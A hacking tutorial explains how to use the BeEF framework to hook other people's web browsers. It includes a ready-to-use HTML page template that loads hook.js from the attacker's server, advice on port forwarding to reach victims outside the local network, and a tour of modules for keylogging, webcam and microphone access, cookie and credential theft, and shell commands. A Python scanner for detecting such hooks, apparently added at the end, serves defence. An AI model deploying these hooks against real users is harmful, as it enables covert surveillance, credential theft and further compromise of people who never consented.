How to Hack Web Browsers Using BeEF Framework 🕶

What is BeEF?

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

http://beefproject.com/

Now that we know a little about the BeEF project, we can start exploiting browsers. Before we start, I will list the required software we will be using.

Installing BeEF

#apt-get update
#apt-get install beef-xss

Requirements

  • Kali Linux or other Linux OS
  • BeEF (The Browser Exploitation Framework)

BeEF comes pre-installed in various pentesting operating systems such as Kali Linux, Parrot OS, BlackArch, Backbox and Cyborg OS. In this tutorial I will be using Kali Linux; there is no difference whether you use Kali Linux or Parrot, the tutorial will still take the same steps.

You can find BeEF in the Kali Linux applications menu.

“Applications” -> “Kali Linux” -> “System Services” -> “BeEF” -> “beef start.”

Or from a new terminal we can start BeEF using the following commands.

cd /usr/share/beef-xss

#./beef


The screenshot shows the BeEF Framework running on 2 interfaces locally. (It does not matter what interface you use as long as your hook payload is correctly configured.)

Accessing BeEF Web GUI

To access the BeEF server, open up any web browser and access localhost (127.0.0.1). BeEF runs a web server on port 3000. We can access BeEF's Web GUI from the following URL.

http://localhost:3000/ui/authentication

The default credentials for BeEF are username “beef” and password “beef”.


BeEF Login Web GUI

  • Once you have logged into the BeEF Web GUI you can see a section on the left, “Hooked Browsers”, with Online Browsers and Offline Browsers. This section shows the victims' hooked status.

Forwarding Ports

  • In this tutorial we will be using BeEF inside of our home network using localhost. If you intend for users outside the network to connect back to BeEF, you will need to open ports within your router's configuration.

www.portforwarding.com

Hooking a Browser

The BeEF hook is a JavaScript file; it is used to hook and exploit targets' web browsers and acts as a C&C channel between the target and the attacker. BeEF is an extremely powerful tool and can gather a lot of information about the target. Once BeEF has hooked a target web browser, it also allows additional commands and modules to be executed against the target.

The example below shows a BeEF hook running on my machine's local IP address.

To find your local IP address you can use “ifconfig” from a new terminal.

ifconfig

BeEF hook http://192.168.43.49:3000/hook.js.

  • To successfully attack a browser we will need to add the BeEF hook to a web page that the victim will visit; there are many methods of delivering a JavaScript payload. The easiest way is to include the JavaScript hook in the head of a web page. After the target visits the compromised web page, their browser will be hooked. You will see the hooked browser's IP address and operating system platform; hovering over the target's hooked browser will provide information about the target system. We can then click on the hooked browser to gain further information and perform further attacks on the system.

Example of BeEF JavaScript Payload

BeEF Framework also includes some default Web Page templates that you can use.

http://localhost:3000/demos/butcher/index.html

Once the target is presented with the web page, their browser will be hooked and will appear in the Hooked Browsers section of the BeEF Web GUI.

  • In the screenshot below we can see BeEF has hooked a target browser and it is online. From here we can find out information such as the browser's version, the plugins the browser is using, and various information about the target system and its software.

The screenshot below shows logs from the target system, such as mouse movements, double clicks and other activity logs created by the target system.

The screenshot below shows the available modules that can be used to exploit the target system, such as keyloggers, viewing the webcam or microphone of the target browser, playing sounds, stealing cookies and credentials, and much more.

You might notice that some of the commands have different colored icons next to them. If you click back to the Getting Started tab, it will explain what each of the colors represents.

Each command module has a traffic light icon, which is used to indicate the following:

  • The command module works against the target and should be invisible to the user
  • The command module works against the target, but may be visible to the user
  • The command module is yet to be verified against this target
  • The command module does not work against this target

BeEF also allows us to send interactive shell commands to the target system; the screenshot below shows the BeEF interactive shell.

BeEF can also be integrated with Metasploit for further system exploitation using modules such as browser_auto_pwn.

Conclusion

JavaScript can be very powerful, so it's always wise to take precautions when visiting various websites. Even if a website is known to be trusted, it can still be subject to watering hole attacks.

We hope you enjoyed this tutorial, Hack Web Browsers Using BeEF. Share it with friends and check back for more Kali Linux hacking tutorials.

Beef framework adding custom pages

  • Open a new command terminal and enter the command “beef-xss”.

  • Launch a web browser and enter your local IP address into the search bar.
    You can find your local IP by using the ifconfig command: ifconfig

  • Default Credentials for Beef-XSS Framework
    Username: beef
    Password: beef

  • After you log into Beef-XSS, open a new terminal and enter the command below. (This command will create a directory to host our templates from.)
    mkdir /usr/share/beef-xss/extensions/demos/html/websites

  • Open a text editor, copy and paste the basic HTML script below into a new text file. Once you have modified the HTML template below, save the file and name it index.html.

    Save file to /usr/share/beef-xss/extensions/demos/html/websites

    <!DOCTYPE html>
    <html>
    <head>
    <title> what ever u want </title>
    <script>
    // 192.168.X.X is a placeholder for the address the BeEF server listens on (see the URLs below)
    // The backslash in <\/script> keeps the browser from closing this outer script block early
    var commandModuleStr = '<script src="http://192.168.X.X:3000/hook.js" type="text/javascript"><\/script>';
    document.write(commandModuleStr);
    </script>
    </head>
    <body>
    <h1> WHAT EVER YOU WANT </h1>
    <p> anything u want </p>
    </body>
    </html>
  • Restart beef framework by opening a command terminal and using the following command:

    service beef-xss restart

  • In a web browser open up beef framework login.

    Replace 192.168.1.121 with your local IP.

    192.168.1.121:3000/ui/panel

    To check if our hook works, open a new tab in your browser and go to the following URL, replacing 192.168.X.X with your local IP address.

    http://192.168.X.X:3000/demos/websites/index.html

  • If the target browser has been successfully hooked it will pop up under online browsers in Beef framework.

  • Deploy commands on the target browser as long as the target stays on the hooked URL, but we can also open a new tab to stay connected. If you want to hook browsers outside your local network, look into port forwarding.
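Both the first post (the hook added to the head of a page) and the template in this reply show what a BeEF hook inclusion looks like in page source: either a direct script tag loading hook.js or a document.write loader that builds that tag at runtime. The scanner below is an added example, not code from either post or from the BeEF project, that a defender can run over saved HTML to flag those patterns; the page host name, the sample HTML and the finding labels are constructed for the example.

```python
# Flag BeEF-style hook.js inclusions in saved page HTML (added defensive example).
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HOOK_PATH_RE = re.compile(r"(^|/)hook\.js(\?|$)", re.I)  # <script src=".../hook.js">
INLINE_HOOK_RE = re.compile(r"hook\.js", re.I)  # loader built with document.write(...)

class HookScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []       # (kind, detail) pairs
        self._script_buf = None  # body of the <script> being read, if any

    def handle_starttag(self, tag, attrs):
        if tag != "script": return
        self._script_buf = []
        src = dict(attrs).get("src")
        if not src: return  # inline script: its body is checked at the end tag
        parsed = urlparse(src)
        if HOOK_PATH_RE.search(parsed.path):
            self.findings.append(("hook_src", src))
        elif parsed.hostname and parsed.hostname.lower() != self.page_host:
            self.findings.append(("third_party_script", src))  # not proof; review it

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf)
            if INLINE_HOOK_RE.search(body):  # runtime loader, as in BeEF's demo templates
                self.findings.append(("inline_loader", body.strip()[:80]))
            self._script_buf = None

def scan_html(html, page_host):
    scanner = HookScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: a page on www.example.com carrying the document.write loader from the post
SAMPLE_HTML = """<html><head><script src="https://cdn.example.net/lib.js"></script>
<script>
var commandModuleStr = '<script src="http://192.168.X.X:3000/hook.js" type="text/javascript"><\\/script>';
document.write(commandModuleStr);
</script></head><body><h1>demo</h1></body></html>"""
```

Running `scan_html(SAMPLE_HTML, "www.example.com")` reports the third-party script for review and the inline loader as a hook finding; a clean page with only same-origin scripts yields no findings.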
